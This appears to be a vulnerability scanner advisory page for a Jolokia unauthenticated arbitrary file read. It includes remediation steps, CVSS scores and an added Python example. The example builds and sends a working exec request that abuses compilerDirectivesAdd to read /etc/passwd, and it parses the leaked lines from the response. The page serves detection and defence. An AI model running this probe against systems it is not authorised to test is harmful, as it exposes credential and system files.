Jolokia Arbitrary File Read

Web App Scanning Plugin ID 113200 (Severity: High)

Synopsis

Jolokia Arbitrary File Read

Description

Jolokia is a JMX-HTTP bridge that serves as an alternative to JSR-160 connectors. When the Jolokia endpoint is reachable without authentication, an attacker can use Jolokia's exec operation to invoke compilerDirectivesAdd on the JVM's com.sun.management:type=DiagnosticCommand MBean. That operation takes a file path, attempts to parse the file as JSON compiler directives, and returns the parse failure, including the file's content, to the caller. An unauthenticated attacker can therefore read any file the JVM process can read.

Solution

If the Jolokia endpoint is not needed, disable it (for Spring Boot, do not include jolokia among the exposed actuator endpoints). If it is required, require authentication for it, for example with Spring Security, and additionally restrict what it can do with a Jolokia access policy (jolokia-access.xml) that denies the exec command on the com.sun.management:type=DiagnosticCommand MBean, so that a stolen or misconfigured credential does not still grant file read. Confirm the fix by requesting the Jolokia list tree and checking that compilerDirectivesAdd is no longer advertised.
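The following Python is an added example, not code from Tenable's plugin or from the Jolokia project. It builds the Jolokia exec request that the Description refers to, checks a Jolokia list response for the exposed operation (the non-invasive verification suggested in the Solution), and parses an exec response for leaked file content. The /jolokia base path is assumed, the sample responses are constructed, and the error wording inside them is illustrative rather than a verbatim JDK message.

```python
"""Probe and verification helpers for the Jolokia compilerDirectivesAdd file read.

Added example, not Tenable's or Jolokia's own code. Assumes the standard
Jolokia JSON API and the HotSpot DiagnosticCommand MBean name; the only
network call is probe(), everything else runs offline.
"""
import json
import re
import urllib.request
from typing import List

MBEAN = "com.sun.management:type=DiagnosticCommand"
OPERATION = "compilerDirectivesAdd"

# Matches a passwd(5) entry: name:passwd:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_-]*:[^:\n]*:\d+:\d+:.*$", re.M)


def exec_request(path: str) -> dict:
    """Jolokia 'exec' body that invokes compilerDirectivesAdd on DiagnosticCommand.
    The operation takes one String[] argument (the list of directive files),
    so the Jolokia arguments array carries a single nested list."""
    return {
        "type": "exec",
        "mbean": MBEAN,
        "operation": OPERATION,
        "arguments": [[path]],
    }


def diagnostic_command_exposed(list_response: dict) -> bool:
    """True if a Jolokia 'list' response (GET <base>/list) advertises the
    operation. Jolokia nests the tree as value -> domain -> "key=value"
    properties -> {"op": ..., "attr": ...}. Use this to confirm an access
    policy hides the operation without ever invoking it."""
    try:
        ops = list_response["value"]["com.sun.management"]["type=DiagnosticCommand"]["op"]
    except (KeyError, TypeError):
        return False
    return isinstance(ops, dict) and OPERATION in ops


def leaked_passwd_lines(exec_response: dict) -> List[str]:
    """Return passwd-style lines found in the operation's return value.

    The JVM tries to parse the named file as JSON compiler directives and
    hands the resulting parse error text back to the caller; that text is
    what carries the file content over Jolokia. The error wording differs
    between JDK versions, so match the file content rather than the wording."""
    if exec_response.get("status") != 200:
        return []  # e.g. 403 from an access policy, 404 for an unknown MBean
    value = exec_response.get("value")
    if not isinstance(value, str):
        return []
    return PASSWD_LINE.findall(value)


def probe(base_url: str, path: str = "/etc/passwd", timeout: float = 10.0) -> dict:
    """POST the exec request to a live Jolokia endpoint (e.g. http://host/jolokia)
    and return the parsed JSON. Only use against systems you are authorised to test."""
    body = json.dumps(exec_request(path)).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/", data=body,
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode())


# Constructed sample responses for offline use (not captured from a real host);
# the error sentence in SAMPLE_EXEC is illustrative, not a verbatim JDK message.
SAMPLE_LIST = {"value": {"com.sun.management": {"type=DiagnosticCommand": {
    "op": {OPERATION: {"args": [{"name": "arguments", "type": "[Ljava.lang.String;"}],
                       "ret": "java.lang.String"}}}}}}

SAMPLE_EXEC = {
    "status": 200,
    "request": exec_request("/etc/passwd"),
    "value": ("Could not load file: /etc/passwd\n"
              "root:x:0:0:root:/root:/bin/bash\n"
              "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"),
}

SAMPLE_DENIED = {"status": 403, "error": "Operation denied by policy"}

if __name__ == "__main__":
    print("exposed:", diagnostic_command_exposed(SAMPLE_LIST))
    print("leaked:", leaked_passwd_lines(SAMPLE_EXEC))
    print("denied:", leaked_passwd_lines(SAMPLE_DENIED))
```

After applying an access policy, run diagnostic_command_exposed against the live list tree first; only if the operation is still advertised is there any reason to send the exec probe, and a 403 with no leaked lines is the expected result once the deny rule is in place.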

See Also

https://thinkloveshare.com/en/hacking/ssrf_to_rce_with_jolokia_and_mbeans/

Plugin Details

Severity: High

ID: 113200

Type: remote

Published: 3/24/2022

Updated: 3/13/2023

Scan Template: api, basic, full, pci, scan

Risk Information

VPR

Risk Factor: Medium

Score: 5.1

CVSS v2

Risk Factor: Medium

Base Score: 5

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS Score Source: Tenable

CVSS v3

Risk Factor: High

Base Score: 7.5

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS Score Source: Tenable

Vulnerability Information

CPE: cpe:2.3:a:jolokia:jolokia:*:*:*:*:*:*:*:*

Exploit Available: true

Exploit Ease: Exploits are available
